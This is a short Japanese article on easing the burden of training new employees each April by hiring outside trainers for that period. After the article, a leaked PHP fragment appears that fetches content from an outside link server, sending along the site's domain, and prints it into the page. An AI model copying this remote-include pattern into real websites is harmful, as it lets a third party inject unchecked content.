前へ
次へ

新人教育の負担を軽減するための対策

会社にとって大卒や高卒などの新人が入ってくる四月は業務に支障が生じがちです。
新人教育をするために現場にいる人材が時間を割かなければならないからです。
普段からギリギリの業務量で、しばしば残業も必要になっているような現場では新人教育の時期になると連日のように残業になる傾向があります。
この負担をいかにして軽減するかは重要な課題ですが、新人ができるだけ早く戦力として活躍してくれるようにならないと困るのも事実でしょう。
この教育の担い手をどうするかと考えたときに、内部からではなく外部から手配することを考えてみるのも重要です。
新人教育のほとんどは基礎的なことなので、必ずしも現場の人がマンツーマンで教えなければ教育効果が得られないというわけではありません。
その業務についてのノウハウをある程度持っている人なら必要なことを教えられるでしょう。
新人教育の時期だけ外部に依頼し、現場教育をする人材を派遣してもらうのが効果的な対策です。

".file_get_contents('http://links-001.com/kanren4set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top